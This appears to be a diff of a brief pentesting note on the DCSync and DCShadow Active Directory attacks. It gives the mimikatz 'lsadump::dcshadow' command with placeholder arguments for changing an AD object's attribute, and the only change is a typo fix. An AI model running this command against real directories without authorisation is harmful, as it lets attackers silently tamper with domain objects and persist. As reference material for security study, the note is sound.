MaxJackson13/Active-Directory/DCSync and DCShadow.md

 From mimikatz run

 `lsadump::dcshadow /object:'object' /attribute:'attribute' /value:'value'`
-- object: the distinguished name of the Ad object to modify
+- object: the distinguished name of the AD object to modify
 - attribute: the name of the AD schema attribute to modify
 - value: the objecteds new value